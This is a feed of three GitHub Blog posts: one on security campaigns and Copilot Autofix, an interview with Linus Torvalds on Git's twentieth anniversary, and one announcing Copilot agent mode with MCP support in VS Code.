author

The GitHub Blog

Stay inspired with updates, ideas, and insights from GitHub to aid developers in software design and development.

April 8, 2025  16:00:16

We get it: youā€™d rather spend your time shipping features than chasing security alerts. Thatā€™s why weā€™ve built tools like Copilot Autofix directly into pull requests, enabling teams to remediate security issues up to 60% faster, significantly reducing Mean Time to Remediation (MTTR) compared to manual fixes. Autofix helps you catch vulnerabilities before they ever make it into production, so you spend less time fixing bugs and more time coding.

But what about the vulnerabilities already lurking in your existing code? Every unresolved security finding adds to your security debtā€”a growing risk you canā€™t afford to ignore. In fact, our data shows that teams typically address only 10% of their security debt, leaving 90% of vulnerabilities unprioritized and unresolved.

A graphic showing that with security campaigns, 55% of security debt is fixed by developers compared to around only 10% of security debt without security campaigns.

Our data shows that security debt is the biggest unaddressed risk that customers face: historically, only 10% of lingering security debt in merged code gets addressed, meaning until today, 90% of risks did not get prioritized. Now, our data shows that 55% of security debt included in security campaigns is fixed.

Security campaigns bridge this gap by bringing security experts and developers together, streamlining the vulnerability remediation process right within your workflow, and at scale. Using Copilot Autofix to generate code suggestions for up to 1,000 code scanning alerts at a time, security campaigns help security teams take care of triage and prioritization, while you can quickly resolve issues using Autofixā€”without breaking your development momentum.

Security campaigns in action

Since security campaigns were launched in public preview at GitHub Universe last year, we have seen organizations at all different stages of their security journey try them out. Whether theyā€™ve been used to reduce security debt across an entire organization or to target alerts in critical repositories, security campaigns have delivered value for both developers and security teams in their efforts to tackle security debt.

Security campaigns simplify life for our developers. They can easily group alerts from multiple repositories, reducing time spent on triage and prioritization while quickly remediating the most critical issues with the help of Copilot Autofix.

- Jose Antonio Moreno, DevSecOps engineer, Lumen

GitHub security campaigns is a game-changer for our development teams. Itā€™s educated us about existing vulnerabilities, brought our engineers together to collaboratively tackle fixes, and significantly improved our remediation time.

- GP, security engineer, Alchemy

In a sample of early customers, we found that 55% of alerts included in security campaigns were fixed, compared to around only 10% of security debt outside security campaigns, a 5.5x improvement. This shows that when alerts are included in a campaign, you can spend more time fixing the security debt, since the prioritization of which alerts to work on has already been taken care of by your security team. In fact, our data shows that alerts in campaigns get roughly twice as much developer engagement than those outside of campaigns.

Security campaigns: how they work

Triaging and prioritizing security problems already present in a codebase has to happen as part of the normal software development lifecycle. Unfortunately, when product teams are under pressure to ship faster, they often donā€™t have enough time to dig through their security alerts to decide which ones to address first. Luckily, in most software organizations, there is already a group of people who are experts in understanding these risks: the security team. With security campaigns, we play to the different strengths of developers and security teams in a new collaborative approach to addressing security debt.

  1. Security teams prioritize which risks need to be addressed across their repositories in a security campaign. Security campaigns come with predefined templates based on commonly used themes (such as the MITRE top 10 known exploited vulnerabilities) to help scope the campaign. GitHubā€™s security overview also provides statistics and metrics summarizing the overall risk landscape.
  2. Once the campaign alerts are selected and a timeline is specified, the campaign is communicated to any developers who are impacted by the campaign. The work defined in a campaign is brought to developers where they work on GitHub, so that it can be planned and managed just like any other feature work.

    A screenshot showing a SQL injection security campaign in progress on GitHub.

  3. Copilot Autofix immediately starts suggesting automatic remediations for all alerts in a campaign, as well as custom help text to explain the problems. Fixing an alert becomes as easy as reviewing a diff and creating a pull request.

Crucially, security campaigns are not just lists of alerts. Alongside the alerts, campaigns are complemented with notifications to ensure that developers are aware of which alert they (or their team) are responsible for. To foster stronger collaboration between developers and the security team, campaigns also have an appointed manager to oversee the campaign progress and be on hand to assist developers. And of course: security managers have an organization-level view on GitHub to track progress and collaborate with developers as needed.

Starting today, you can also access several new features to plan and manage campaign-related work more effectively:

  • Draft security campaigns: security managers can now iterate on the scope of campaigns and save them as draft campaigns before making them available to developers. With draft campaigns, security managers can ensure that the highest priority alerts are included before the work goes live.
  • Automated GitHub Issues: security managers can optionally create GitHub Issues in repositories that have alerts included in the campaign. These issues are created and updated automatically as the campaign progresses and can be used by teams to track, manage and discuss campaign-related work.
  • Organization-level security campaign statistics: security managers can now view aggregated statistics showing the progress across all currently-active and past campaigns.

For more information about using security campaigns, see About security campaigns in the GitHub documentation.

The post Found means fixed: Reduce security debt at scale with GitHub security campaigns appeared first on The GitHub Blog.

April 8, 2025  17:42:59

Exactly twenty years ago, on April 7, 2005, Linus Torvalds made the very first commit to a new version control system called Git. Torvalds famously wrote Git in just 10 days after Linux kernel developers lost access to their proprietary tool, BitKeeper, due to licensing disagreements. In fact, in that first commit, heā€™d written enough of Git to use Git to make the commit!

Gitā€™s unconventional and decentralized designā€”nowadays ubiquitous and seemingly obviousā€”was revolutionary at the time, and reshaped how software teams collaborate and develop. (To wit, GitHub!)

To celebrate two decades of Git, we sat down with Linus himself to revisit those early days, explore the key design decisions behind Gitā€™s lasting success, and discuss how it forever changed software development.

Check out the transcript of our interview below, and check back later this week for the full video of our interview.

Want to watch a sneak peek of our video interview with Linus? šŸ‘‡

The following transcript has been lightly edited for clarity.


Taylor Blau: Itā€™s been 20 years, almost to the hour, since Git was self-hosted enough to write its initial commit. Did you expect to be sitting here 20 years later, still using it and talking about it?

Linus Torvalds: Still using it, yes. Maybe not talking about it. I mean, that has been one of the big surprisesā€”basically how much it took over the whole SCM world. I saw it as a solution to my problems, and I obviously thought it was superior. Even literally 20 years ago to the day, I thought that first version, which was pretty rawā€”to be honest, even that version was superior to CVS.

But at the same time, Iā€™d seen CVS just hold on to the marketā€”I mean, SVN came around, but itā€™s just CVS in another guise, right?ā€”for many, many decades. So I was like, okay, this market is very sticky. I canā€™t use CVS because I hate it with a passion, so Iā€™ll do my own thing. I couldnā€™t use BitKeeper, obviously, anymore. So I was like, okay, Iā€™ll do something that works for me, and I wonā€™t care about anybody else. And really that showed in the first few months and yearsā€”people were complaining that it was kind of hard to use, not intuitive enough. And then something happened, like there was a switch that was thrown.

ā€œIā€™ll do something that works for me, and I wonā€™t care about anybody else.ā€

Well, you mentioned BitKeeper. Maybe we can talk about that.

Sure.

Pretty famously, you wrote the initial version of Git in around 10 or so days as a replacement for the kernel.

Yes and no. It was actually fewer thanā€”well, it was about 10 days until I could use it for the kernel, yes. But to be fair, the whole process started like December or November the year before, so 2004.

What happened was BitKeeper had always worked fairly well for me. It wasnā€™t perfect, but it was light years ahead of anything else Iā€™ve tried. But BitKeeper in the kernel community was always very, like, not entirely welcomed by the community because it was commercial. It was free for open source use because Larry McVoy, who I knew, really liked open source. I mean, at the same time, he was making a business around it and he wanted to sell BitKeeper to big companies. [It] not being open source and being used for one of the biggest open source projects around was kind of a sticking point for a lot of people. And it was for me, too.

I mean, to some degree I really wanted to use open source, but at the same time Iā€™m very pragmatic and there was nothing open source that was even remotely good enough. So I was kind of hoping that something would come up that would be better. But what did come up was that Tridge in Australia basically reverse engineered BitKeeper, which wasnā€™t that hard because BitKeeper internally was basically a good wrapper around SCCS, which goes back to the 60s. SCCS is almost worse than CVS.

But that was explicitly against the license rules for BitKeeper. BitKeeper was like, you can use this for open source, but you canā€™t reverse engineer it. And you canā€™t try to clone BitKeeper. And that made for huge issues. And this was all in private, so I was talking to Larry and I was emailing with Tridge and we were trying to come up with a solution, but Tridge and Larry were really on completely opposite ends of the spectrum and there was no solution coming up.

So by the time I started writing Git, I had actually been thinking about the issue for four months and thinking about what worked for me and thinking about ā€œHow do I do something that does even better than BitKeeper does but doesnā€™t do it the way BitKeeper does it?ā€ I did not want to be in the situation where Larry would say, ā€œHey, you did the one thing you were not supposed to do.ā€

ā€œā€¦how do I do something that does even better than BitKeeper does, but doesnā€™t do it the way BitKeeper does it.ā€

So yes, the writing part was maybe 10 days until I started using Git for the kernel, but there was a lot of mental going over what the ideas should be.

I want to talk about maybe both of those things. We can start with that 10-day period. So as I understand it, you had taken that period as a time away from the kernel and had mostly focused on Git in isolation. What was that transition like for you to just be working on Git and not thinking about the kernel?

Well, since it was only two weeks, it ended up being that way. It wasnā€™t actually a huge deal. Iā€™d done things like that just forā€”Iā€™ve been on, like in the last 35 years, Iā€™ve been on vacation a couple of times, right, not very many times. But I have been away from the kernel for two weeks at a time before.

And it was kind of interesting because it wasā€”one of my reactions was how much easier it is to do programming in the userspace. Thereā€™s so much less you need to care about. You donā€™t need to worry about memory allocations. You donā€™t need to worry about a lot of things. And debugging is so much easier when you have all this infrastructure that youā€™re writing when youā€™re doing a kernel.

So it was actually somewhatā€”I mean, I wouldnā€™t say relaxing, but it was fun to do something userspace-y where I had a fairly clear goal of what I wanted. I mean, a clear goal in the sense I knew the direction. I didnā€™t know the details.

One of the things I find so interesting about Git, especially 20 years on, is itā€™s soā€¦ the development model that it encourages, to me, seems so simple that itā€™s almost obvious at this point. But I donā€™t say that as a reductive term. I think there must have been quite a lot of thought into distilling down from the universe of source control ideas down into something that became Git. Tell me, what were the non-obvious choices you made at the time?

The fact that you say itā€™s obvious now, I think it wasnā€™t obvious at the time. I think one of the reasons people found Git to be very hard to use was that most people who started without using Git were coming from a background of something CVS like. And the Git mindset, I came at it from a file system personā€™s standpoint, where I had this disdain and almost hatred of most source control management projects, so I was not at all interested in maintaining the status quo.

And like the biggest issue for meā€”well, there were two huge issues. One was performanceā€”back then I still applied a lot of patches, which I mean, Git has made almost go away because now I just merge other peopleā€™s code.

But for me, one of the goals was that I could apply a patch series in basically half a minute, even when it was like 50, 100 patches.

You shouldnā€™t need a coffee toā€¦

Exactly. And that was important to me because itā€™s actually a quality-of-life thing. Itā€™s one of those things where if things are just instant, some mistake happens, you see the result immediately and you just go on and you fix it. And some of the other projects I had been looking at took like half a minute per patch, which was not acceptable to me. And that was because the kernel is a very large project and a lot of these SCMs were not designed to be scalable.

ā€œAnd that was important to me because itā€™s actually a quality-of-life thing.ā€

So that was one of the issues. But one of the issues really was, I knew I needed it to be distributed, but it needed to be really, really stable. And people kind of think that using the SHA-1 hashes was a huge mistake. But to me, SHA-1 hashes were never about the security. It was about finding corruption.

Because weā€™d actually had some of that during the BitKeeper things, where BitKeeper used CRCs and MD5s, right, but didnā€™t use it for everything. So one of the early designs for me was absolutely everything was protected by a really good hash.

And that kind of drove the whole project. having two or three really fundamental design ideas which is why at a low level it is actually fairly simple right and then the complexities are in the details and the user interfaces and in all the things it has to be able to do because everybody wants it to do crazy things. But having a low level design that has a few core concepts made it easier to write and much easier to think and also to some degree explain to people what the ideas are.

And I kind of compare it to Unix. Unix has like a core philosophy of everything is a process, everything is a file, you pipe things between things. And then the reality is itā€™s not actually simple. I mean, thereā€™s the simple concepts that underlie the philosophy, but then all the details are very complicated.

And I think thatā€™s what made me appreciate Unix in the first place. And I think Git has some of the same kind of, thereā€™s a fundamental core simplicity to the design and then thereā€™s the complexity of implementation.

Thereā€™s a through line from Unix into the way that Git was designed.

Yes.

You mentioned SHA-1. One of the things that I think about in this week or two where you were developing the first version of Git is you made a lot of decisions that have stuck with us.

Yeah.

Were there any, including SHA-1 or not, that you regretted or wish you had done differently?

Well, I mean, SHA-1 I regret in the sense that I think it caused a lot of pointless churn with the whole ā€œtrying to support SHA-256 as well as SHA-1.ā€ And I understand why it happened, but I do think it was mostly pointless.

I donā€™t think there was a huge, real need for it, but people were worried, so it was short. So I think thereā€™s a lot of wasted effort there. Thereā€™s a number of other small issues. I think I made a mistake in how the index file entries are sorted. I think thereā€™s these stupid details that made things harder than they should be.

But at the same time, many of those things could be fixed, but theyā€™re small enough. It doesnā€™t really matter. All the complexities are elsewhere in the end.

So it sounds like you have few regrets. I think thatā€™s good. Were there any moments where you werenā€™t sure that what you were trying to achieve was going to work or come together or be usable? Or did you already have a pretty clear idea?

I had a clear idea of the initial stages but I wasnā€™t sure how it would work in the long run. So honestly, after the first week, I had something that was good for applying patches, but not so much for everything else. I had the basics for doing merges, and the data structures were in place for that, but it actually took, I think it took an additional week before I did my first merge.

There were a number of things where I had kind of the big picture and result in mind, but I wasnā€™t sure if Iā€™d get there. Yeah, the first steps, I mean the first week or two, I mean, you can go and look at the codeā€”and people haveā€”and it is not complicated code.

No.

I think the first version was 10,000 lines or something.

You can more or less read it in a single sitting.

Yeah, and itā€™s fairly straightforward and doesnā€™t do a lot of error checking and stuff like that. Itā€™s really a, ā€œLetā€™s get this working because I have another project that I consider to be more important than I need to get back to.ā€ It really was. It happened where I would hit issues that required me to do some changes.

ā€œThere were a number of things where I had kind of the big picture and result in mind, but I wasnā€™t sure if Iā€™d get there.ā€

The first versionā€”I think we ended up doing a backwards incompatible object store transfer at one point. At least fsck complains about some of the old objects we had because I changed the data format.

I didnā€™t know where that came from.

Yeah, no. The first version just was not doing everything it needed to do.

And I forget if I actually did a conversion or not. I may not have ever needed to convert. And we just have a few warnings for a few objects in the kernel where fsck will say, ā€œHey, this is an old, no longer supported format.ā€ That kind of thing. But on the other, on the whole, it really worked, I mean, surprisingly well.

The big issue was always peopleā€™s acceptance of it.

Right.

And that took a long time.

ā€œBut on the other, on the whole, it really worked, I mean, surprisingly well.ā€

Well, we talked a little bit about how merging was put in place but not functional until maybe week two or week three. What were the other features that you left out of the initial version that you later realized were actually quite essential to the project?

Well, it wasnā€™t so much ā€œlater realized,ā€ it was stuff that I didnā€™t care about, but I knew that if this is going to go anywhere, somebody else will. I mean, the first week when I was using it for the kernel, I was literally using the raw, what are now called ā€œplumbing commandsā€ by hand.

Of course.

Because there was no so-called porcelain. There was nothing above that to make it usable. So to make a commit, youā€™d do these very arcane things.

Set your index, commit-tree.

Yeah, commit-tree, write, and that just returns an SHA that you write by hand into the head file and that was it.

Did hash-object exist in the first version?

I think that was one of the first binaries that I had where I could just check that I could hash everything by hand and it would return the hash to standard out, then you could do whatever you wanted to it. But it was like the early porcelain was me scripting shell scripts around these very hard-to-use things.

And honestly, it wasnā€™t easy to use even with my shell scripts.

But to be fair, the first initial target audience for this were pretty hardcore kernel people who had been using BitKeeper. They at least knew a lot of the concepts I was aiming for. People picked it up.

It didnā€™t take that long before some other kernel developers started actually using it. I was actually surprised by how quickly some source control people started coming in. And I started getting patches from the outside within days of making the first Git version public.

I want to move forward a bit. You made the decision to hand off maintainership to Junio pretty early on in the project. I wonder if you could tell me a little bit about what itā€™s been like to watch him run the project and really watch the community interact with it at a little bit of a distance after all these years?

I mean, to be honest, I maintained Git for like three or four months. I think I handed it off in August [of 2005] or something like that.

And when I handed it off, I truly just handed it off. I was like, ā€œIā€™m still around.ā€ I was still reading the Git mailing list, which I donā€™t do anymore. Junio wanted to make sure that if he asked me anything, Iā€™d be okay.

But at the same time, I was like, this is not what I want to do. I mean, this isā€¦ I still feel silly. My oldest daughter went off to college, and two months later, she sends this text to me and says that Iā€™m more well-known at the computer science lab for Git than for Linux because they actually use Git for everything there. And I was like, Git was never a big thing for me. Git was an ā€œI need to get this done to do the kernel.ā€ And itā€™s kind of ridiculous that, yes, I used four months of my life maintaining it, but now, at the 20 years laterā€¦

Yes, you should definitely talk to Junio, not to me because heā€™s been doing a great job and Iā€™m very happy it worked out so well. But to be honest Iā€™ll take credit for having worked with people on the internet for long enough that I was likeā€”during the four months I was maintaining Git, I was pretty good at picking up who has got the good taste to be a good maintainer.

My oldest daughter went off to college, and two months later, she sends this text to me and says that Iā€™m more well known at the computer science lab for Git than for Linux because they actually use Git for everything there.

Thatā€™s what itā€™s aboutā€”tasteā€”for you.

For me, itā€™s hard to describe. You can see it in patches, you can see it in how they react to other peopleā€™s code, ā€œhow they thinkā€ kind of things. Junio was not the first person in the project, but he was one of the early ones that was around from pretty much week one after I had made it public.

So he was one of the early personsā€”but it wasnā€™t like youā€™re the first one, tag youā€™re it. It was more like okay, I have now seen this person work for three months and I donā€™t want to maintain this project. I will ask him if he wants to be the maintainer. I think he was a bit nervous at first, but it really has been working out.

Yeah heā€™s certainly run the project very admirably in theā€¦

Yeah, I mean, so taste is to me very important, but practically speaking, the fact that you stick around with a project for 20 years, thatā€™s the even more important part, right? And he has.

I think heā€™s knowledgeable about almost every area of the tree to a surprising degree.

Okay, so weā€™ve talked a lot about early Git. I want to talk a little bit about the middle period of Git maybe, or maybe even the period weā€™re in now.

One of the things that I find so interesting about the tool, given how ubiquitous itā€™s become, itā€™s clearly been effective at aiding the kernelā€™s development, but itā€™s also been really effective for university students writing little class projects on their laptops. What do you think was unique about Git that made it effective at both extremes of the software engineering spectrum?

So the distributed nature really ends up making so many things so easy and that was one big part that set Git apart from pretty much all SCMs before, wasā€¦ I mean there had been distributed SCMs, but there had, as far as I know, never been something where it was like the number one design goalā€”I mean, along with the other number one design goalsā€”where it means that you can work with Git purely locally and then later if you want to make it available in any other place itā€™s so easy.

And thatā€™s very different from, say, CVS where you have to set up this kind of repository and if you ever want to move it anywhere else itā€™s just very very painful and you canā€™t share it with somebody else without losing track of it.

Or thereā€™s always going to be one special repository when youā€™re using a traditional SCM and the fact that Git didnā€™t do that, and very much by design didnā€™t do that, I mean thatā€™s what made services like GitHub trivial. I mean Iā€™m trivializing GitHub because I realized thereā€™s a lot of work in making all the infrastructure around Git, but at the same time the basic Git hosting site is basically nothing because the whole design of Git is designed around making it easy to copy, and every repository is the same and equal.

And I think that ended up being what made it so easy to then use as an individual developer. When you make a new Git repository, itā€™s not a big deal. Itā€™s like you do in Git and youā€™re done. And you donā€™t need to set up any infrastructure and you donā€™t need to do any of the stuff that you traditionally needed to do with an SCM. And then if that project ever grows to be something where you decide, ā€œOh, maybe I want other people to work with it,ā€ that works too. And again, you donā€™t have to do anything about it. You just push it to GitHub and again, youā€™re done.

That was something I very much wanted. I didnā€™t realize how many other people wanted it, too. I thought people were happy with CVS and SVN. Well, I didnā€™t really think that, but I thought they were sufficient for most people, letā€™s put it that way.

Iā€™ve lived my whole life with version control as part of software development, and one of the things Iā€™m curious about is how you see Gitā€™s role in shaping how software development gets done today.

Thatā€™s too big of a question for me. I donā€™t know. It wasnā€™t why I wrote Git. I wrote it for my own issues.

I think GitHub and the other hosting services have made it clear how easy it is now to make all these random small projects in ways that it didnā€™t used to be. And that has resulted in a lot of dead projects too. You find these one-off things where somebody did something and left it behind and itā€™s still there.

But does that really change how software development is done in the big picture? I donā€™t know. I mean, it changes the details. It makes collaboration easier to some degree. It makes it easier to do these throwaway projects. And if they donā€™t work, they donā€™t work. And if they do work, now you can work together with other people. But Iā€™m not sure it changed anything fundamentally in software development.

ā€œIt makes collaboration easier to some degree.ā€

Moving ahead a little bit, modern software development has never been changing faster than it is todayā€¦

Are you going to say the AI word?

Iā€™m not going to say the AI word, unless you want me to.

No, no, no.

ā€¦what are some of the areas of the tool that you think have evolved or maybe still need to evolve to continue to support the new and demanding workflows that people are using it for?

Iā€™d love to see more bug tracking stuff. I mean, everybody is doing that. I mean, there are, whether you call it bug tracking or issues or whatever you want to call it, Iā€™d love to see that be more unified. Because right now itā€™s very fragmented where every single hosting site does their own version of it.

And I understand why they do it. A, there is no kind of standard good base. And B, itā€™s also a way to do the value add and keep people in that ecosystem even when Git itself means that itā€™s really easy to move the code.

But I do wish there was a more unified thing where bug tracking and issues in general would be something that would be more shared among the hosting sites.

You mentioned earlier that itā€™s at least been a while since you regularly followed the mailing list.

Yeah.

In fact, itā€™s been a little bit of time since you even committed to the project. I think by my count, August of 2022 was the last timeā€¦

Yeah, I have a few experimental patches in my tree that I just keep around. So these days I do a pull of the Git sources and I have, I think, four or five patches that I use myself. And I think Iā€™ve posted a couple of them to the Git mailing list, but theyā€™re not very important. Theyā€™re like details that tend to be very specific to my workflow.

But honestly, I mean, this is true of the Linux kernel, too. Iā€™ve been doing Linux for 35 years, and it did everything I needed in the first yearā€”right? And the thing that keeps me going on the kernel side is, A, hardware keeps evolving, and a kernel needs to evolve with that, of course. But B, itā€™s all the needs of other people. Never in my life would I need all of the features that the kernel does. But Iā€™m interested in kernels, and Iā€™m still doing that 35 years later.

When it came to Git, it was like Git did what I needed within the first year. In fact, mostly within the first few months. And when it did what I needed, I lost interest. Because when it comes to kernels, Iā€™m really interested in how they work, and this is what I do. But when it comes to SCMs, itā€™s likeā€”yeah, Iā€™m not at all interested.

ā€œWhen it came to Git, it was like Git did what I needed within the first year. In fact, mostly within the first few months.ā€

Have there been any features that youā€™ve followed in the past handful of years from the project that you found interesting?

I liked how the merge strategies got slightly smarter. I liked how some of the scripts were finally rewritten in C just to make them faster, because even though I donā€™t apply, like, 100 patch series anymore, I do end up doing things like rebasing for test trees and stuff like that and having some of the performance improvements.

But then, I mean, those are fairly small implementation details in the end. Theyā€™re not the kind of big changes that, I meanā€”I think the biggest change that I was still tracking a few years ago was all the multiple hashes thing, which really looks very painful to me.

Have there been any tools in the ecosystem that youā€™ve used alongside? I mean, Iā€™m a huge tig user myself. I donā€™t know if youā€™ve ever used this.

I neverā€”no, even early on when we had, like when Git was really hard to use and they were like these add-on UIs, the only wrapper around Git I ever used was gitk. And that was obviously integrated into Git fairly quickly, right? But I still use the entire command language. I donā€™t use any of the editor integration stuff. I donā€™t do any of that because my editor is too stupid to integrate with anything, much less Git.

I mean, I occasionally do statistics on my Git history usage just because Iā€™m like, ā€œWhat commands do I use?ā€ And it turns out I use five Git commands. And git merge and git blame and git log are three of them, pretty much. So, Iā€™m a very casual user of Git in that sense.

I have to ask about what the other two are.

I mean obviously git commit and git pull. I did this top five thing at some point and it may have changed, but thereā€™s not a lot ofā€”I do have a few scripts that then do use git rev-list and go really low and do statistics for the projectā€¦

In terms of your interaction with the project, what do you feel like have been some of the features in the project either from early on or in the time since that maybe havenā€™t gotten the appreciation they deserve?

I mean Git has gotten so much more appreciation than it deserves. But thatā€™s the reverse of what I would ask me. A big thing for me was when people actually started appreciating what Git could do instead of complaining about how different it was.

And that, I mean, that was several years after the initial Git. I think it was these strange web developers who started using Git in a big way. Itā€™s like Ruby on Rails, I think. Which I had no idea, I still donā€™t know what Ruby even is. But the Ruby on Rails people started using Git sometime in 2008, something like this.

It was strange because it brought in a completely new kind of Git userā€”at least one that I hadnā€™t seen before. It must have existed in the background, it just made it very obvious that suddenly you had all these young people who had never used SCM in their life before and Git was the first thing they ever used and it was what the project they were using was using, so it was kind of the default thing.

And I think it changed the dynamics. When you didnā€™t have these old timers who had used a very different SCM their whole life, and suddenly you had young people who had never seen anything else and appreciated it, and instead of saying, ā€œGit is so hard,ā€ I started seeing these people who were complaining about ā€œHow do I do this when this old project is in CVS?ā€ So, that was funny.

But yeah, no. The fact that people are appreciating Git, I mean, way more than I ever thought. Especially considering the first few years when I got a lot of hate for it.

Really?

Oh, the complaints kept coming.

Tell me about it.

Oh, I mean, itā€™s more like I canā€™t point to details. Youā€™d have to Google it. But the number of people who sent me, ā€œWhy does it do this?ā€ And the flame wars over my choice of names. For example, I didnā€™t have git status, which actually is one of the commands I use fairly regularly now.

Itā€™s in the top five?

Itā€™s probably not in the top five, but itā€™s still something fairly common. I donā€™t think Iā€™d ever used it with CVS because it was so slow.

And people had all these expectations. So I just remember the first few years, the complaints about why the names of the subcommands are different for no good reason. And the main reason was I just didnā€™t like CVS very much, so I did things differently on purpose sometimes.

And the shift literally between 2007 and 2010ā€”those years, when people went from complaining about how hard Git was to use to really appreciating some of the power of Git, was interesting to me.

I want to spend maybe just a moment thinking about the future of the project. In your mind, what are the biggest challenges that Git either is facing or will face?

I donā€™t even know. I mean, it has just been so much more successful than I everā€¦ I mean, the statistics are insane. It went from use for the kernel and a couple of other projects to being fairly popular to now being like 98% of the SCMs used. I mean, thatā€™s a number I saw in some report from last year.

So, I mean, itā€™sā€”I donā€™t know how true that is, but itā€™s like big. And in that sense, I wouldnā€™t worry about challenges because I think SCMs, there is a very strong network effect. And thatā€™s probably why, once it took off, it took off in a big way. Just when every other project is using Git, by default, all the new projects will use Git, too. Because the pain of having two different SCMs for two different projects to work on is just not worth it.

So I would not see that as a challenge for Git as much as I would see it as a challenge for anybody else who thinks they have something better. And honestly, because Git does everything that I need, the challenges would likely come from new users.

I mean, we saw some of that. We saw some of that with people who used Git in ways that explicitly were things I consider to be the wrong approach. Like Microsoft, the monorepo for everything, which showed scalability issues. Iā€™m not saying Microsoft was wrong to do that. Iā€™m saying this is literally what Git was not designed to do.

I assume most of those problems have been solved because Iā€™m not seeing any complaints, but at the same time Iā€™m not following the Git mailing list as much as I used to.

Well, itā€™s very kind. Thatā€™s most of what I work on, so I appreciate it.

Okay. But I mean, also, people whoā€”I donā€™t know, I donā€™t even know if the large file issue is considered to be solved. If you want to put a DVD image in Git, that was like, why would you ever want to do that?

But, I mean, thatā€™s the challenge. When Git is everywhere, you find all these people who do strange things that you would never imagineā€”that I didnā€™t imagine and that I consider to be actively wrong.

But hey, I mean, thatā€™s a personal opinion. Clearly other people have very different personal opinions. So thatā€™s always a challenge. I mean, thatā€™s something I see in the kernel, too, where I go, why the hell are you doing that? I mean, that shouldnā€™t work, but youā€™re clearly doing it.

ā€œWhen Git is everywhere, you find all these people who do strange things that you would never imagineā€”that I didnā€™t imagine and that I consider to be actively wrong.ā€

We talked about how Git is obviously a huge dominant component in software development. At the same time, there are new version control upstarts that seem to pop up. Pijul comes to mind, Jujutsu, Piper, and things like that. Iā€™m curious if youā€™ve ever tried any of them.

No, I donā€™t. I mean, literally, since I came from this, from being completely uninterested in source control, why would I look at alternatives now that I have something that works for me?

I really came into Git not liking source control, and now I donā€™t hate it anymore. And I think that databases are my particularā€”like, thatā€™s the most boring-thing-in-life thing. But SCMs still havenā€™t been something Iā€™m really interested in.

ā€œI really came into Git not liking source control, and now I donā€™t hate it anymore.ā€

Youā€™ve given me a little bit of an end to my last question for you. So on schedule, Linux came about 34 years ago, Git 20ā€¦

Oh, that question.

And so weā€™re maybe five or so years overdue for the next big thing.

No, no, I see it the other way around. All the projects that Iā€™ve had to make, I had to make because I couldnā€™t find anything better that somebody else did.

But I much prefer other people solving my problems for me. So me having to come up with a project is actually a failure of the worldā€”and the world just hasnā€™t failed in the last 20 years for me.

I started doing Linux because I needed an operating system and there was nothing that suited my needs. I started doing Git for the same reason. And there hasnā€™t been anyā€¦ I started Subsurface, which is my divelog, well, no longer my divelog software, but that was so specialized that it never took off in a big way. And that solved one particular problem, but my computer use is actually so limited that I think Iā€™ve solved all the problems.

Part of it is probably, Iā€™ve been doing it so long that I can only do things in certain ways. Iā€™m still using the same editor that I used when I was in college because my fingers have learned one thing and thereā€™s no going back. And I know the editor is crap and I maintain it because itā€™s a dead project that nobody else uses.

ā€œBut I much prefer other people solving my problems for me. So me having to come up with a project is actually a failure of the worldā€”and the world just hasnā€™t failed in the last 20 years for me.ā€œ

So, I have a source tree and I compile my own version every time I install a new machine and I would suggest nobody ever use that editor but I canā€™t. Iā€™ve tried multiple times finding an editor that is more modern and does fancy things like colorize my source code and do things like that. And every time I try it, Iā€™m like, ā€œYeah, these hands are too old for this.ā€ So I really hope thereā€™s no project that comes along that makes me go, ā€œI have to do this.ā€

Well, on that note.

On that note.

Thank you for 20 years of Git.

Well, hey, I did it for my own very selfish reasons. And reallyā€”I mean, this is the point to say again that yes, out of the 20 years, I spent four months on it. So really, all the credit goes to Junio and all the other people who are involved in Git that have by now done so much more than I ever did.

In any event, thank you.

The post Git turns 20: A Q&A with Linus Torvalds appeared first on The GitHub Blog.

April 6, 2025  20:16:35

Allow us to reintroduce ourselves: GitHub Copilot is getting a whole lot more agentic with increased context of your tools and services, powered by the worldā€™s leading models, starting today. šŸ‘

We are excited to roll out agent mode in Visual Studio Code to all users, now complete with MCP support that unlocks access to any context or capabilities you want. Whatā€™s more, we are thrilled to release a new open source and local GitHub MCP server, giving you the ability to add GitHub functionality to any LLM tool that supports MCP. šŸ¤–

In keeping with our commitment to offer multi-model choice, weā€™re making Anthropic Claude 3.5, 3.7 Sonnet, 3.7 Sonnet Thinking, Google Gemini 2.0 Flash, and OpenAI o3-mini generally available via premium requests, included in all paid Copilot tiers. These premium requests are in addition to unlimited requests for agent mode, context-driven chat, and code completions that all paid plans have when using our base model (šŸ‘€ more below). With the new Pro+ tier, individual developers get the most out of the latest models with Copilot.

The agent awakening doesnā€™t stop there. We are also announcing the general availability of the Copilot code review agent, which in just over a month in preview has been used by over 1 million developers on GitHub. Plus, the general availability of next edit suggestions so you can tab tab tab your way to coding glory. šŸ†

Agent mode in VS Code

Agent mode is progressively rolling out to VS Code users in stable, as we aim for full availability to all users in the coming weeks. You can also manually enable it now. Compared to chat or multi-file edits, which allow you to propose code changes across multiple files in your workspace, agent mode is fundamentally capable of taking action to translate your ideas into code. With simple prompts, agent mode takes Copilot beyond answering a question, instead completing all necessary subtasks across automatically identified or generated files to ensure your primary goal is achieved. Agent mode can suggest terminal commands or tool calls and ask you to execute them. It also analyzes run-time errors with self-healing capabilities.

Since the launch to VS Code Insiders in February, developers have been using agent mode for a variety of tasks: from autofixing code gen errors, to building webapps, to yeeting commits ā€“ whatever that means. šŸ™‚

A tweet from user Ryan '@xthree' that reads 'Used the new agent mode of VS Code's Copilot. I'm impressed. I threw at it what I thought was going to be a monumental task, and it scanned 4-5 different files, figured out how it was working, and made modifications in all those files to work exactly how I wanted. First time.'
https://x.com/xthree/status/1902748372022264142

Agent mode is powered by your choice of Claude 3.5 and 3.7 Sonnet, Google Gemini 2.0 Flash, and OpenAI GPT-4o. Currently, agent mode achieves a pass rate of 56.0% on SWE-bench Verified with Claude 3.7 Sonnet. We anticipate agent mode to grow more capable as chain of thought reasoning models continue to advance.

Model Context Protocol (MCP) is now available in public preview

Developers spend their days conducting a wide array of tasks to get the job done, from research, to navigating telemetry, to infrastructure management, to coding and debugging. And they use many tools for this, the so-called engineering stack. MCP allows you to equip agent mode with the context and capabilities it needs to help you, like a USB port for intelligence. When you enter a chat prompt in agent mode within VS Code, the model can use different tools to handle tasks like understanding database schema or querying the web. This setup allows for more interactive and context-sensitive coding support.

For example, with a prompt to ā€œUpdate my GitHub profile to include the title of the PR that was assigned to me yesterday,ā€ agent mode would take that request, combined with the list of all available MCP tools, and ask an LLM what to do next. Over time, the agent would continue calling tools iteratively, until the task is complete.

